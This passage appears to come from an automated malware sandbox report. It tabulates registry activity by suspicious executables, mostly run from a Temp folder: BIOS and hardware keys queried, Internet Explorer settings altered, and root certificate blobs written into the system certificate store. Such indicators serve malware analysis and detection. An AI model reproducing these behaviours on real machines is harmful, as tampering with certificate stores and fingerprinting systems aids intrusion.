| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\Configuration Data | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSerialNumber | C:\Users\Admin\AppData\Roaming\ff5c5ee747fc\feburary.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer | C:\Users\Admin\AppData\Local\Temp\Files\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName | C:\Users\Admin\AppData\Local\Temp\Files\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0\Configuration Data | C:\Windows\system32\csrss.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001c30168373bd67488d269fecd6a2bc0000000000020000000000106600000001000020000000428a498d9b33545a728d562201be8553477937453dcc8742003f48394de762a2000000000e80000000020000200000005f3b2835302475fe92950a8b14772487a34dc5701c4117069cafbdf58170cc3e20000000aa606b387281fc3e7ba3c072e359f1ebfcff7508b442eab55edf0dc31bf33c69400000009e5a28b8bafae44ef6255c96639ba1bb723605702cfca478f3d014991f8a0b9007a7b4aed50a6cdb23603b55bbcf364789f1b370726d4245e580731c7ad02c78 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 608c6a698c4edb01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001c30168373bd67488d269fecd6a2bc00000000000200000000001066000000010000200000009d6e692a7f649b7357e230dada9e70220679d5a851b1f509084c9a9b204aab63000000000e80000000020000200000008f1ff3aaba0a19ab3596b6d2dde7100a7a5ae71390c55251f4ae561710fcb7c490000000b9a4e96a280feee0c87a3097248aad41c39421415a6ec258305753a2d2071f3c0fc41caaa803a3cfb673c58db80c39f9156c9f95b909760936a64066cf15656dd4c5535e4d2b71075dea6a20a583c46a172cfd5e7a8f15ba636cc67af8e95d74bcd24eb20d90c7b9a3dfada996816ce699763571e6a034e9400a74461d2ed18b02509190cb3108694e01702215872acd40000000c3d375b3eaac2616d94cc2c95746498343409453a7c6f1107cb913097328e687c466964c9d1ce7544fb156d2dccaf175e83ee97542538bc604f2fa0bc170885c | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{890229C1-BA7F-11EF-AE6B-D67A8E2D59D5} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT\CRLs | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager\LastLoadedDPI = "96" | C:\Windows\system32\winlogon.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 801cd5178c4edb01 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\63C768CF\LanguageList = 650073002d0045005300000065007300000065006e002d0055005300000065006e0000000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager\ThemeActive = "1" | C:\Windows\system32\winlogon.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager\LoadedBefore = "1" | C:\Windows\system32\winlogon.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT\Certificates | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager\DllName = "%SystemRoot%\\resources\\themes\\Aero\\Aero.msstyles" | C:\Windows\system32\winlogon.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager\ColorName = "NormalColor" | C:\Windows\system32\winlogon.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\MachinePreferredUILanguages = 650073002d004500530000000000 | C:\Windows\system32\winlogon.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager\LastUserLangID = "3082" | C:\Windows\system32\winlogon.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager\SizeName = "NormalSize" | C:\Windows\system32\winlogon.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager | C:\Windows\system32\winlogon.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT\CTLs | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\Files\lega.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\Files\t5abhIx.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\Files\t5abhIx.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\Files\lega.exe | N/A |
